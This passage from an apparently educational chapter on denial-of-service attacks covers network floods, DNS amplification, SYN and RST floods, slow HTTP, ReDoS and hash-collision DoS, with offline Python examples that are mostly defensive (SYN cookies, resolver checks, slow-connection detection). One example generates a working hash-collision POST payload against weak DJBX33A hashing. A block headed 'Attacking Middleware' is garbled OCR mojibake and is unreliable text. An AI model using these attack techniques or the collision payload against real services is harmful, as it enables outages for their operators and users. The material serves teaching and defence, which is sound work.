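    tcbs_after_flood = len(srv.tcbs)

    # Genuine client with ISN 539, so the server acknowledges 540 as in the text's figures.
    synack = srv.on_syn("10.0.90.35", 2585, 539, now_minute=100)
    genuine = srv.on_ack("10.0.90.35", 2585, seq=synack["ack"],
                         ack=(synack["seq"] + 1) & MASK32, now_minute=101)

    # Forged ACK from a host that never received a SYN-ACK.
    forged = srv.on_ack("10.2.88.84", 1234, seq=540, ack=1233, now_minute=101)

    # Stale ACK: correct cookie, but presented long after the window closed.
    late = srv.on_syn("10.0.90.36", 2586, 777, now_minute=100)
    stale = srv.on_ack("10.0.90.36", 2586, seq=late["ack"],
                       ack=(late["seq"] + 1) & MASK32, now_minute=110)
    return {"tcbs_after_flood": tcbs_after_flood, "genuine": genuine,
            "forged": forged, "stale": stale, "tcbs_final": len(srv.tcbs)}


if __name__ == "__main__":
    print(simulate())
```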

(Attacking Middleware) ia^jit *k 
jjjL ^ .Ai^V JU^I l£1 yr^^ i> ^ U^W^ *^ hash functions jjLp^ dU^JI *l j^j 

l^ijUaj s-bl J^nlajll ( . UjolJ (jl a^I g all 'bllCket (J^ (J^-&^ £J A "> J^- ' J^*^ J^ 3 ^ CS"^ 

j ^I^JjojI t . UjujJ ^jl (j£-oJ 4<JJ2kJ (J^lgJl ^^lla J ^ L_ax_jJall Jalfij aIa^J uAj 1 (p^lt » ^ ^alj diljUJl cJ^j] ^ O^-^ UJUa 

/ flxjjaH aJI jV (middleware) a » " jl^ (^0) J') J^*^ l^^ 3 (>< ^ cl^ ^ ^ l uj 1 ^^'^ a ^ ^ 4_i^jja3l
^Jc. J jj^a^Jl jUaiiVl ^^i^ ^ ajl^jJoW Jja ^ jniriti <Lla (jj^j V ^ (middleware) ^ > u j3l '^-^5 uj-^ ^

.AliSaJ 4_kjjuj jll ^^Ic ^usu ^1 djU^kll tilti Vj tj^HaVl JSLaaII ^ ^1 j^JJ V ^ j^l ^ kj > » jll D^ixJl Ja^V 

^jxi JJS tilLlA (jj^J ^JJ '^J^ 1 ^ cJ^^ t * a J 1 ^ (^5-^ 4_L^ dlli jjc. (_^^>^.l CjU»^.j toAsujjaixi (jj^J ^ lAlito ^^jII ^^^Jl 

Attacking A Resource

Denial of service does not have to target the victim's own host. Shared infrastructure such as DNS is a natural target: if the name servers a site depends on are overwhelmed, the site becomes unreachable even though its web servers are idle. Operators respond with overprovisioning, buying more bandwidth and server capacity than normal load requires, but an attacker who can muster more traffic than the provisioned margin still wins, and capacity is expensive while attack traffic is cheap.

The rest of this section therefore classifies attacks by the resource they exhaust: the network links, the servers' connection state, and the application's processing capacity. For each class there are proven mitigation techniques, and the most effective ones are applied close to the resource they protect, not at the victim's edge after the damage is done.

Pure Flooding

The simplest form of denial of service is to send more traffic than the victim's link can carry. The attacker exploits nothing; the only goal is to consume all of the bandwidth available to the victim's network, which is why this is called a bandwidth consumption attack. Once the upstream link is saturated, legitimate packets are dropped before they ever reach the victim's routers, so nothing the victim does on its own equipment helps.

Because the congestion is on the link from the ISP into the victim's network, the flood can only be filtered upstream, at the ISP (or at least at the router on the ISP's side of the link). The protocol hardly matters: UDP datagrams to random ports, ICMP, or packets carrying arbitrary IP protocol numbers all consume bandwidth equally, and the source addresses can be forged. Floods are increasingly combined with reflection and amplification, using open DNS resolvers and similar services to multiply the attacker's traffic, and with high-rate HTTP requests against web servers.

If the volume exceeds the ISP's own capacity, the ISP's other customers are affected too, which is why an ISP under a large flood will typically drop traffic for the victim's addresses in order to protect everyone else.

1. Attacks Targeting Network Resources

Attacks on network resources are also known as bandwidth attacks or network floods. A flooding attack sends the victim an enormous number of packets from a single host or, far more often, from a botnet, so that the combined traffic saturates the victim's links.

UDP Flood: The User Datagram Protocol (UDP) is sessionless; there is no handshake, so a datagram can be sent to any port with a forged source address and the victim cannot verify where it came from. In a UDP flood the attacker sends large volumes of datagrams to random ports on the victim. For each datagram the victim checks whether an application is listening on that port, finds none, and replies with an ICMP "destination unreachable" message, consuming its own bandwidth and CPU in the process. A UDP flood is a volumetric attack, measured in megabits per second (Mbps) of bandwidth and in packets per second (PPS).
ICMP Flood: The Internet Control Message Protocol (ICMP) is used by hosts and routers to report errors and to carry diagnostic messages, such as the echo request and echo reply behind "ping". Like UDP, ICMP is connectionless, so the attacker can forge the source address of every packet.

[Figure: UDP flood. A botnet of infected hosts directed by the attacker sends UDP datagrams to the victim's web server until its bandwidth is saturated.]

In an ICMP flood (also called a ping flood) the attacker sends a stream of ICMP_ECHO requests to the victim as fast as possible without waiting for the replies. The victim spends bandwidth receiving the requests and more bandwidth answering each one with an ICMP_ECHO_REPLY, so both directions of the link are consumed. Like the UDP flood, this is a volumetric attack measured in Mbps and PPS, and it relies on the design of the TCP/IP suite rather than on any application bug: ICMP must be processed by the victim's stack regardless of which services the host runs.



[Figure: ICMP flood. ICMP flooding is a type of DoS attack in which perpetrators send a large number of packets with fake source addresses to a target server in order to crash it and cause it to stop responding to TCP/IP requests. After the ICMP threshold is reached, the router rejects further ICMP echo requests from all addresses in the same security zone for the remainder of the current second and the next second as well. Arrows show ECHO Requests flowing to the victim and ECHO Replies returning.]
IGMP Flood: The Internet Group Management Protocol (IGMP) lets IP hosts join and leave multicast groups on a local network. Because it is connectionless and easy to forge, an attacker can flood a network or a router with IGMP membership reports and queries so that the devices spend their time maintaining multicast state instead of forwarding traffic.

2. Amplification Attacks

An amplification attack uses a third party to multiply the attacker's traffic. The classic form abuses the IP broadcast address: a single packet sent to a network's broadcast address is delivered to every host on that network, and every host answers. When the attacker forges the source address of that packet to be the victim's IP, all of the answers go to the victim. The two well-known variants are the Smurf attack (ICMP amplification) and the Fraggle attack (UDP amplification).
In a Smurf attack the attacker sends ICMP echo requests to the IP network broadcast address (or a multicast address) of an intermediary network, with the source address set to the victim's IP.

[Figure: Smurf attack. The attacker's spoofed echo requests reach the broadcast address; the hosts on the intermediary network return ICMP echo replies whose destination is the victim's IP.]

If the intermediary network's router forwards the broadcast, every host on that network receives the ICMP echo request and sends an ICMP echo reply to the apparent source, the victim. A single spoofed request is thus turned into one reply per host; with hundreds of hosts on the network the attacker's bandwidth is multiplied by that factor. Because the replies come from the intermediary's hosts rather than from the attacker, this is also called a reflection attack, and the intermediary network is the reflector. The defence on the intermediary side is to stop routers from forwarding directed broadcasts; on Cisco IOS this is configured per interface with no ip directed-broadcast, as in the following example:

Router(config)# interface GigabitEthernet 0 
Router(config-if)# no ip directed-broadcast 

A more powerful and harder-to-trace variant is DNS amplification. The reflector is a recursive DNS name server that answers queries from anyone (an open recursive server) and caches what it resolves. The attacker sends a small query with the victim's address as the source, and the server sends the much larger answer to the victim.

A widely analysed DNS amplification attack in 2006 used more than 32,000 open recursive domain name servers. The attacker first compromised an authoritative DNS server and published a very large resource record (RR) in its zone. The botnet then sent queries for that record to the open recursive servers, each query carrying the victim's IP as its source address. Each server fetched the record once from the authoritative server, cached the result, and then served it from cache for every following query. A query of about 56 bytes produced a response of about 4,028 bytes, an amplification of roughly 72 times the attacker's outbound traffic.
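The amplification ratio and the open-recursive condition described above can be checked on the wire with a hand-built query. The example below is added here and is not code from the book; it constructs a minimal DNS query with RD=1, parses the response header and computes the bandwidth amplification factor. The response it parses is fabricated inline (a placeholder name, four large TXT records) so that it runs offline; no real server or zone is involved.

```python
"""Open-recursive resolver check and amplification ratio on hand-built DNS
messages. Added example, not the page's own code. The response is constructed
to resemble a large TXT answer; the hostname is a placeholder.
"""
import struct
from typing import Dict, List

QTYPE_ANY, QTYPE_TXT, QCLASS_IN = 255, 16, 1
RCODE_REFUSED = 5


def encode_qname(name: str) -> bytes:
    return b"".join(bytes([len(p)]) + p.encode("ascii")
                    for p in name.rstrip(".").split(".")) + b"\x00"


def build_query(name: str, qtype: int = QTYPE_ANY, txid: int = 0x1234) -> bytes:
    """Minimal query with RD=1 (recursion desired), one question, no EDNS."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_qname(name) + struct.pack("!HH", qtype, QCLASS_IN)


def parse_header(msg: bytes) -> Dict[str, int]:
    txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", msg[:12])
    return {"id": txid, "qr": flags >> 15 & 1, "rd": flags >> 8 & 1,
            "ra": flags >> 7 & 1, "rcode": flags & 0xF,
            "qdcount": qd, "ancount": an}


def is_open_recursive(query: bytes, response: bytes) -> bool:
    """A resolver is open-recursive for us if it answers our RD=1 query with
    RA=1, NOERROR and at least one answer, instead of REFUSED or a referral."""
    q, r = parse_header(query), parse_header(response)
    return (r["id"] == q["id"] and r["qr"] == 1 and r["ra"] == 1
            and r["rcode"] == 0 and r["ancount"] > 0)


def amplification_factor(query: bytes, response: bytes) -> float:
    """Bytes the victim receives per byte the attacker has to send."""
    return len(response) / len(query)


# --- constructed test data --------------------------------------------------

def build_response(query: bytes, rdatas: List[bytes], rcode: int = 0, ra: int = 1) -> bytes:
    """Fabricate a reply to `query`: QR=1, RD=1, RA as given, one TXT RR per rdata.
    Each answer's name is a compression pointer (0xC00C) to the question name."""
    txid, _, qd, *_ = struct.unpack("!HHHHHH", query[:12])
    flags = 0x8000 | 0x0100 | (ra << 7) | rcode
    answers = b"".join(
        struct.pack("!HHHIH", 0xC00C, QTYPE_TXT, QCLASS_IN, 3600, len(rd)) + rd
        for rd in rdatas)
    header = struct.pack("!HHHHHH", txid, flags, qd, len(rdatas), 0, 0)
    return header + query[12:] + answers


def demo() -> Dict[str, object]:
    query = build_query("big-record.example")                 # placeholder name
    big = build_response(query, [b"\xfe" + b"A" * 254] * 4)   # 4 TXT RRs, 255 B each
    refused = build_response(query, [], rcode=RCODE_REFUSED, ra=0)
    return {"query_len": len(query), "open": is_open_recursive(query, big),
            "refused_open": is_open_recursive(query, refused),
            "factor": amplification_factor(query, big)}


if __name__ == "__main__":
    print(demo())
```

Against a live resolver the same query would be sent with a UDP socket to port 53 and the reply fed to is_open_recursive and amplification_factor; a resolver that returns REFUSED (rcode 5) with RA clear is not usable as a reflector, which is the state every resolver not meant for the public should be in.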



[Figure: DNS amplification. (1) Compromise an authoritative DNS server and publish a large resource record. (2) Instruct the botnet to launch the attack. (3) The botnet sends DNS requests with the victim's address, asking for the large resource record, to a large number of open recursive DNS servers on the Internet. (4) Each server queries the authoritative server once, then caches the record and sends the large responses to the victim.]
Connection-oriented attack: the attacker has to establish a connection before the attack can be delivered, so the traffic comes from real, unspoofed addresses, typically bots or compromised hosts. TCP- and HTTP-based attacks belong to this class. Connectionless attack: no connection is required and the attacker never needs the victim's reply, so the source address can be forged freely. UDP and ICMP floods are connectionless, which is why they are the favoured vehicles for spoofed DDoS traffic.



3. Attacks Targeting Server Resources

These attacks aim at the state a server must keep per client rather than at the link: the TCP connection table, threads, buffers and the handshake logic. Firewalls and IPS devices in front of the server keep the same kind of per-connection state and can be exhausted in the same way.
TCP/IP Weaknesses

[Figure: a client host and a server host exchanging segments over time, illustrating the three-way handshake.]

Most attacks on server resources exploit the design of the TCP/IP protocol suite. A TCP segment carries control bits ("flags") that drive the connection state machine: SYN, ACK, RST, PSH, FIN and URG. Unlike UDP, TCP is connection-oriented and reliable: it numbers every byte, acknowledges what it receives and retransmits what is lost, which means both ends must keep state for each connection.

A connection is set up with the three-way handshake mechanism (SYN, SYN-ACK, ACK). The client sends a SYN with its initial sequence number, the server answers with a SYN-ACK acknowledging it and supplying its own, and the client completes the connection with an ACK. Only then is data exchanged. Every step of this exchange is a point where an attacker who does not play by the rules can leave the server holding state for a connection that will never be used.

TCP SYN Flood

A server that offers a TCP service must accept connection attempts from anyone, and until the handshake finishes it has no way to tell a real client from a forged one. A TCP SYN flood, also called SYN flooding, abuses this: the attacker sends a stream of SYN segments, usually with spoofed source IP addresses, and never completes the handshakes.

For every SYN the server allocates connection state (and, in older servers, a thread) and replies with a SYN-ACK, then waits for the final ACK. Because the source addresses are forged, the ACK never arrives; the server retransmits the SYN-ACK several times and keeps the half-open connection in its backlog until a timer expires. The backlog is small, so a modest rate of SYNs is enough to keep it permanently full. While it is full, SYNs from legitimate users are dropped and the service is effectively offline even though the server's bandwidth and CPU are largely idle.


[Figure: SYN flood. The legitimate user completes SYN, SYN+ACK, ACK and gets a connection. The attacker sends attack SYNs with spoofed source IPs; the victim's web server opens a thread (or backlog entry) for each SYN request and waits for ACKs that never come.]



SYN flooding therefore works by sending a large number of TCP connection requests with the SYN flag set from forged addresses. The server's SYN/ACK replies go to hosts that never asked for them, and each unanswered half-open connection sits in the backlog until it times out. The attacker can flood from spoofed addresses because TCP never checks where a SYN actually came from; the only "check" is the ACK of the SYN/ACK, and the attacker simply never sends it. Since each SYN is a single small segment, the attack costs the attacker almost nothing compared with what it costs the server.

The best-known mitigation is SYN Cookies: instead of storing the half-open connection, the server encodes the connection parameters into the initial sequence number of its SYN/ACK and allocates state only when an ACK arrives whose acknowledgement number proves the client saw that SYN/ACK. Other defences include shortening the SYN-RECEIVED timer, enlarging the backlog, and filtering or rate-limiting SYNs at a firewall. A SYN flood can in the end be absorbed by a server with enough capacity and the right settings, which is why attackers combine it with DDoS volumes that exceed what any single server or firewall can handle.
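The SYN cookie idea from this section and from the TCB discussion earlier (no TCB until a valid ACK returns) is small enough to show in full. The code below is an added example, not the book's own, and it is a simplification of the Linux layout: the 32-bit server ISN carries a 5-bit time counter, a 2-bit index into a small MSS table and a 25-bit keyed MAC over the four-tuple and the client's ISN. SECRET, the 64-second counter period and MSS_TABLE are assumptions for the demo; the spoofed-flood simulation uses documentation addresses.

```python
"""SYN cookies: a stateless handshake that allocates no TCB until the ACK proves
the client saw our SYN-ACK. Added example, not the page's own code.

Cookie layout (32 bits), an illustrative simplification of the Linux scheme:
    [5 bits: time counter] [2 bits: MSS table index] [25 bits: keyed MAC]
"""
import hashlib
import hmac
import os
import random
from dataclasses import dataclass
from typing import Optional

SECRET = os.urandom(32)              # per-boot secret (assumed)
COUNTER_PERIOD = 64                  # cookie counter ticks every 64 s
MSS_TABLE = (536, 1300, 1440, 1460)  # MSS values encodable in 2 bits


@dataclass(frozen=True)
class FourTuple:
    saddr: str
    sport: int
    daddr: str
    dport: int


def _mac(t: FourTuple, client_isn: int, counter: int) -> int:
    msg = f"{t.saddr}|{t.sport}|{t.daddr}|{t.dport}|{client_isn}|{counter}".encode()
    return int.from_bytes(hmac.new(SECRET, msg, hashlib.sha256).digest()[:4], "big")


def mss_index(mss: int) -> int:
    """Largest table entry not exceeding the client's MSS (index 0 if none)."""
    idx = 0
    for i, m in enumerate(MSS_TABLE):
        if mss >= m:
            idx = i
    return idx


def make_cookie(t: FourTuple, client_isn: int, mss: int, now: int) -> int:
    """Server ISN for the SYN-ACK; it encodes everything a TCB would have held."""
    counter = now // COUNTER_PERIOD
    mac = _mac(t, client_isn, counter) & 0x1FFFFFF
    return ((counter & 0x1F) << 27) | (mss_index(mss) << 25) | mac


def check_cookie(t: FourTuple, client_isn: int, ack: int, now: int) -> Optional[int]:
    """Validate the final ACK. Returns the negotiated MSS, or None if the ACK is
    forged, stale (older than one counter period) or for another 4-tuple."""
    cookie = (ack - 1) & 0xFFFFFFFF
    counter_bits = cookie >> 27
    current = now // COUNTER_PERIOD
    if (current & 0x1F) == counter_bits:
        counter = current
    elif ((current - 1) & 0x1F) == counter_bits:
        counter = current - 1
    else:
        return None                                   # expired cookie
    if (cookie & 0x1FFFFFF) != (_mac(t, client_isn, counter) & 0x1FFFFFF):
        return None                                   # MAC mismatch: forged
    return MSS_TABLE[(cookie >> 25) & 0x3]


class StatelessListener:
    """Models a server under SYN flood: TCBs are created only by valid ACKs."""

    def __init__(self) -> None:
        self.tcbs: dict = {}

    def on_syn(self, t: FourTuple, client_isn: int, mss: int, now: int) -> int:
        # No allocation here: the SYN-ACK's sequence number *is* the state.
        return make_cookie(t, client_isn, mss, now)

    def on_ack(self, t: FourTuple, client_isn: int, ack: int, now: int) -> bool:
        mss = check_cookie(t, client_isn, ack, now)
        if mss is None:
            return False
        self.tcbs[t] = {"mss": mss, "rcv_nxt": client_isn + 1}
        return True


def tcbs_after_flood(n: int, now: int = 100_000) -> int:
    """Spoofed SYNs that never complete the handshake allocate nothing."""
    srv = StatelessListener()
    rng = random.Random(1)
    for _ in range(n):
        t = FourTuple(f"198.51.100.{rng.randrange(256)}", rng.randrange(1024, 65536),
                      "192.0.2.10", 80)
        srv.on_syn(t, rng.getrandbits(32), 1460, now)
    return len(srv.tcbs)


if __name__ == "__main__":
    t = FourTuple("203.0.113.5", 40000, "192.0.2.10", 80)
    srv = StatelessListener()
    isn = srv.on_syn(t, 1000, 1460, now=100_000)
    print("legitimate client completes:", srv.on_ack(t, 1000, isn + 1, now=100_030))
    print("TCBs after 10000 spoofed SYNs:", tcbs_after_flood(10_000))
```

The cost of the trick is visible in the code: only the MSS survives the round trip (window scaling and SACK options are lost in this simplified layout, which is why real stacks enable cookies only once the backlog overflows), and a cookie is accepted for at most two counter periods, so a client that answers very late is treated as a stranger and has to retry.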

TCP RST Attack

TCP uses the RST flag to abort a connection immediately. A segment with RST set is accepted if its addresses and ports match an established connection and its sequence number falls inside the receiver's window. In a TCP RST attack the attacker forges such segments with the IP address of one endpoint, either to tear down a legitimate connection between two other parties or to flood the victim with resets. Because a blind attacker does not know the connection's sequence numbers, the forged RSTs must cover the window by guessing, and they are therefore typically sent in bulk from a botnet.

[Figure: TCP RST attack. A legitimate user holds an established TCP connection with the victim's web server; the attacker injects RST segments carrying the user's address.]



TCP PSH+ACK Flood

A TCP segment with the PUSH flag set tells the receiving stack to deliver the data to the application immediately rather than holding it in the TCP receive buffer; ACK is set on every segment of an established connection. In a PSH+ACK flood the attacker, usually through a botnet, sends a continuous stream of such segments at the victim. Each one forces the server to empty its TCP stack buffer and hand the data to the application, and to acknowledge receipt. The result is CPU and buffer exhaustion on the server: it is kept busy processing pushes and sending ACKs until it can no longer serve legitimate requests.

[Figure: PSH+ACK flood. The attacker sends segments with TCP flag PSH = 1 to the victim's web server; PSH forces the server to empty its buffer for every segment.]



"Low and Slow" Attacks

"Low and slow" attacks are the opposite of flooding. They need neither high bandwidth nor many sources; a single machine on an ordinary connection is enough. The attacker opens connections to the victim and keeps them alive for as long as possible while sending as little data as the protocol allows. Each connection ties up a server resource (a thread, a socket, a buffer), and since the number of concurrent connections a server can hold is finite, enough of them exhaust it. Because the traffic rate is tiny and every individual request looks legitimate, these attacks slip past volume-based detection.

Sockstress

Sockstress is a tool that exhausts a server's TCP resources through the handshake itself and then through the TCP window mechanism. The attacker sends a SYN, the server answers SYN-ACK, and the attacker completes the handshake with an ACK, so the connection is legitimately established. In that final ACK, however, the client advertises a TCP window size of 0 bytes. The receive window tells the sender how many bytes the other side can currently accept, so a window of 0 means "I cannot receive anything right now". A well-behaved server does not close such a connection: it keeps the connection and its send buffer and periodically sends a window size probe asking whether the client can receive yet. The attacking tool, which keeps no state of its own for these connections, keeps answering with window 0, so the server holds the connection open indefinitely. Repeated across thousands of connections, this consumes the server's socket and memory resources, and on some implementations left the system so starved that it had to be rebooted.

[Figure: Sockstress. The attacker completes SYN, SYN+ACK, ACK with the victim's web server, then advertises TCP window size = 0; the connection is established but the client says it cannot receive data, so the server keeps it open.]



SSL-Based Attacks

The Secure Sockets Layer (SSL) protocol, and its successor TLS, authenticates servers and encrypts the connection between the parties; it runs on top of TCP/IP and below the application protocol. Setting up an SSL session requires a handshake in which the server performs expensive public-key operations, far more work for the server than for the client. Attacks can target the SSL handshake itself (forcing the server to keep negotiating), exploit bugs in particular SSL implementations, or simply carry ordinary attack traffic inside SSL. SSL-based attacks are attractive as a DoS vehicle because the server cannot inspect the payload without decrypting it, and most DDoS detection devices are "asymmetric" in the sense that they see the encrypted stream but not what is inside it. The cost asymmetry is the other reason: a single attacker can request many more handshakes than a server can complete.
Encrypted-based HTTP attacks (HTTPS floods)

Many web applications run entirely over SSL/TLS (HTTPS) to protect sensitive data end to end. Inspecting attacks carried inside HTTPS is a challenge: a DDoS mitigation device that cannot decrypt the traffic sees only opaque connections and cannot tell an HTTP flood from normal browsing, and a device that can decrypt needs the server's private key and considerable CPU to do so at line rate. HTTPS floods therefore behave like ordinary HTTP floods (large numbers of GET or POST requests from a botnet) but are much harder to detect and filter, and each request additionally costs the server the work of decryption.

THC-SSL-DOS

THC-SSL-DOS is a tool released by The Hacker's Choice (THC) in 2011 to demonstrate how little it takes to bring down an SSL server. It is a "low and slow" attack in the sense that it needs neither bandwidth nor many hosts: a single machine establishes a handful of SSL connections and then abuses SSL renegotiation, asking the server to perform a fresh handshake over and over on each connection. Because the server does roughly an order of magnitude more computation per handshake than the client, one laptop can saturate the CPU of a server that would otherwise handle large volumes of legitimate HTTPS traffic. The practical lesson is to disable client-initiated renegotiation wherever it is not needed.

4. Attacks Targeting Application Resources

Application-layer attacks target the Hypertext Transfer Protocol (HTTP), HTTPS, and other service protocols such as DNS, SMTP, FTP and VoIP. Every application has resources that can be exhausted: worker processes, request queues, database connections, session tables. Unlike network floods, application attacks need relatively little bandwidth; many of them are "low and slow", and all of them use requests that are individually valid, which makes them hard to distinguish from real users. HTTP is by far the most common target because it is the protocol every public web application must speak.

HTTP Flood

The HTTP flood is the most widespread and the easiest application-layer attack. The attacker sends large numbers of apparently legitimate HTTP GET or POST requests to the web application, exhausting its capacity to serve responses. An HTTP flood is usually launched from many machines, either volunteered machines or bots, to spread the load and evade per-source rate limits. A GET flood requesting the most expensive pages (large files, search results, dynamic content) does the most damage per request. Tools such as the High Orbit Ion Cannon (HOIC) were built to make this easy: HOIC runs a multi-threaded HTTP flood from each participating machine and can randomize request headers so that individual requests look different to filters.



[Figure: HTTP flood. The attacker issues a command through a C&C server to bots (infected hosts), each of which sends HTTP GET requests to the victim's web server.]



DNS Flood

A DNS flood is one of the hardest floods to detect and mitigate, because DNS is the service every other service depends on. The Domain Name System (DNS) normally runs over UDP (TCP is used for large answers and zone transfers), so queries are connectionless and their source can be forged. In a DNS flood the attacker sends a very large number of valid-looking DNS queries to the victim's name servers, so that they spend all their time resolving and answering and have nothing left for legitimate clients.

"Low and Slow" Attacks

At the application layer, "low and slow" attacks are the most effective and the hardest to detect. Instead of overwhelming the server they exploit the way HTTP servers dedicate a worker (a thread or process) to each connection: the attacker opens connections that are valid but extremely slow and holds each worker for as long as possible. A few hundred such connections are enough to occupy every worker on a server with a fixed-size pool, at a bandwidth cost close to zero.

Slow HTTP GET Request

A slow HTTP GET attack keeps connections open by never finishing the request. The attacker sends a partial HTTP request, for example the request line and a few headers, and then trickles one more header line every few seconds, just often enough to keep the server from hitting its read "time out". Because the server never sees the blank line that ends the HTTP header, it cannot begin processing and cannot release the worker. Servers that dedicate a thread to each connection, such as Apache in its default configurations, run out of threads quickly.

[Figure: slow HTTP GET. Apache opens a thread for each connection request; the attacker's incomplete requests keep those threads on the victim's Apache server waiting.]



Slow HTTP POST Request

The slow HTTP POST attack is the body-side counterpart. The attacker sends a complete and valid request header for an HTTP POST, in which the Content-Length field declares a large message body, and then sends the body extremely slowly, a byte or a few bytes at a time, at intervals just short enough to avoid the idle timeout. Unlike the slow GET, the headers here are complete and correct, so defences that only check header completion do not fire. The server has allocated a worker and is waiting for the declared number of bytes, which may take hours to arrive. Multiplied over thousands of connections, the server's connection pool is exhausted and new clients are turned away.

[Figure: slow HTTP POST. The attacker sends a partial HTTP POST with the request header complete and the "Content-Length" parameter set, then 1-byte packets at long intervals; the web server opens a thread for each connection request and waits for content-length bytes.]
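Both slow variants show up in per-connection telemetry as connections that age without making progress, and the tell-tale of an attack rather than a bad link is many such connections from one client. The following is an added example, not code from the book: it classifies connection samples as "slow-headers" (the slow GET case) or "slow-body" (the slow POST case) and reports clients holding more than a threshold of them. The samples are constructed, and the thresholds are assumptions a site would tune to its own traffic.

```python
"""Flagging slow HTTP GET/POST connections from per-connection telemetry.
Added example, not the page's own code. Samples are constructed; thresholds
(header_timeout, min_body_rate, per_client_limit) are assumptions.
"""
from collections import Counter
from dataclasses import dataclass
from typing import Dict, Iterable, List


@dataclass(frozen=True)
class ConnSample:
    client: str
    age_s: float          # seconds since the connection was accepted
    headers_done: bool    # the blank line ending the headers has been seen
    content_length: int   # declared by the client; 0 when absent
    body_bytes: int       # body bytes received so far


def classify(s: ConnSample, header_timeout: float = 10.0,
             min_body_rate: float = 100.0, grace_s: float = 5.0) -> str:
    """'slow-headers' for a stalled request line/headers, 'slow-body' for a
    POST that trickles a declared body below min_body_rate B/s, else 'ok'."""
    if not s.headers_done:
        return "slow-headers" if s.age_s > header_timeout else "ok"
    remaining = s.content_length - s.body_bytes
    if remaining > 0 and s.age_s > grace_s and s.body_bytes / s.age_s < min_body_rate:
        return "slow-body"
    return "ok"


def suspicious_clients(samples: Iterable[ConnSample], per_client_limit: int = 10) -> Dict[str, int]:
    """Clients holding more than per_client_limit slow connections at once.
    One slow connection is a bad link; dozens from one address is an attack."""
    slow = Counter(s.client for s in samples if classify(s) != "ok")
    return {c: n for c, n in slow.items() if n > per_client_limit}


def constructed_samples() -> List[ConnSample]:
    samples: List[ConnSample] = []
    # Attacker: 40 POSTs, each declaring 1 MiB and having sent 120 bytes in 60 s.
    samples += [ConnSample("198.51.100.7", 60.0, True, 1_048_576, 120) for _ in range(40)]
    # Attacker, second tool: 15 connections whose headers never complete.
    samples += [ConnSample("198.51.100.8", 45.0, False, 0, 0) for _ in range(15)]
    # Real upload on a slow mobile link: one connection at 20 KiB/s.
    samples.append(ConnSample("203.0.113.20", 30.0, True, 5_000_000, 600_000))
    # Ordinary page view: headers done, no body, fresh connection.
    samples.append(ConnSample("203.0.113.21", 0.4, True, 0, 0))
    # A single stalled connection from a flaky client: slow, but not an attack.
    samples.append(ConnSample("203.0.113.22", 20.0, False, 0, 0))
    return samples


if __name__ == "__main__":
    for s in constructed_samples()[-3:]:
        print(s.client, classify(s))
    print(suspicious_clients(constructed_samples()))
```

The same two signals are what server-side mitigations enforce: Apache's mod_reqtimeout, for example, accepts a directive of the form RequestReadTimeout header=20-40,MinRate=500 body=20,MinRate=500, which closes connections whose headers or body arrive more slowly than the stated minimum rate.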
Regular Expression DoS attacks

A regular expression denial of service (ReDoS) is another "low and slow" attack, in which a small input makes the server's regular expression software library do an enormous amount of work. Most regex engines use backtracking, and patterns with nested or overlapping quantifiers, such as (a+)+ followed by something that cannot match, force the engine to try an exponential number of paths before failing. Such patterns are called evil regexes. The attacker either finds one in the application (input validation is a common place) or supplies one where the application lets users enter patterns, and then sends inputs crafted to trigger the worst case. One request can pin a CPU core for minutes, so a handful of requests suffice. The defences are to audit patterns for nested quantifiers, to use an engine with linear-time guarantees, and to bound input length and matching time.

Hash Collisions DoS attacks

Web application servers parse the parameters of a POST request into a hash table for the session. If the hash function is predictable, an attacker can compute thousands of parameter names that all map to the same hash value ("hash collisions"). Collision resolution in most tables is a linked list per bucket, so inserting n colliding keys costs on the order of n squared comparisons instead of n. In a Hash Collision DoS the attacker sends POST requests carrying such parameter sets; a single request of a few hundred kilobytes can occupy a CPU core for minutes, and a small number of requests take the server down. The attack targets the application platform (the language runtime or framework) rather than a particular site, which is why it affected so many systems at once and was fixed by randomizing the hash function per process.
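The mechanism behind this attack and behind the middleware hash-table discussion earlier in the chapter can be reproduced in a few dozen lines. The example below is added here and is not the book's code: it generates colliding keys for the DJBX33A hash (h = h*33 + c, the family several web runtimes used before the 2011 disclosures), parses a constructed POST body into a chained hash table that counts key comparisons, and then does the same with a keyed hash. The colliding keys are derived here from two equal-valued two-character blocks, not copied from any advisory, and KEY is an assumed per-process secret.

```python
"""Hash-collision DoS against a parameter table, and the keyed-hash fix.
Added example, not the page's own code. The hash is DJBX33A (h = h*33 + c);
the colliding keys are generated here from two equal-valued blocks.
"""
import hashlib
import hmac
import itertools
import os
from typing import Callable, List

# Two-character blocks with equal DJBX33A value: 'E'*33+'z' == 'F'*33+'Y' == 2399.
BLOCKS = ("Ez", "FY")
KEY = os.urandom(16)   # per-process secret for the hardened variant (assumed)


def djbx33a(s: str) -> int:
    h = 5381
    for c in s.encode():
        h = (h * 33 + c) & 0xFFFFFFFF
    return h


def keyed_hash(s: str) -> int:
    """Keyed hash: without KEY an attacker cannot predict which keys collide."""
    return int.from_bytes(hmac.new(KEY, s.encode(), hashlib.sha256).digest()[:4], "big")


def colliding_keys(n_blocks: int) -> List[str]:
    """2**n_blocks distinct strings with identical DJBX33A hashes. The hash is a
    polynomial in 33, so swapping equal-valued blocks at the same position
    leaves the total unchanged."""
    return ["".join(p) for p in itertools.product(BLOCKS, repeat=n_blocks)]


class ChainedTable:
    """Separate-chaining hash table that counts key comparisons (the work done)."""

    def __init__(self, hash_fn: Callable[[str], int], nbuckets: int = 1024) -> None:
        self.hash_fn, self.nbuckets = hash_fn, nbuckets
        self.buckets: List[List[str]] = [[] for _ in range(nbuckets)]
        self.comparisons = 0

    def insert(self, key: str) -> None:
        chain = self.buckets[self.hash_fn(key) % self.nbuckets]
        for existing in chain:            # linear scan of the bucket's chain
            self.comparisons += 1
            if existing == key:
                return
        chain.append(key)


def parse_post_body(body: str, hash_fn: Callable[[str], int]) -> ChainedTable:
    """Model of a framework parsing 'a=1&b=2&...' into a per-request table."""
    table = ChainedTable(hash_fn)
    for pair in body.split("&"):
        name, _, _value = pair.partition("=")
        table.insert(name)
    return table


def attack_body(n_blocks: int = 10) -> str:
    """1024 colliding parameter names, about 22 KB of request body."""
    return "&".join(f"{k}=1" for k in colliding_keys(n_blocks))


if __name__ == "__main__":
    body = attack_body()
    print("weak hash comparisons:", parse_post_body(body, djbx33a).comparisons)
    print("keyed hash comparisons:", parse_post_body(body, keyed_hash).comparisons)
```

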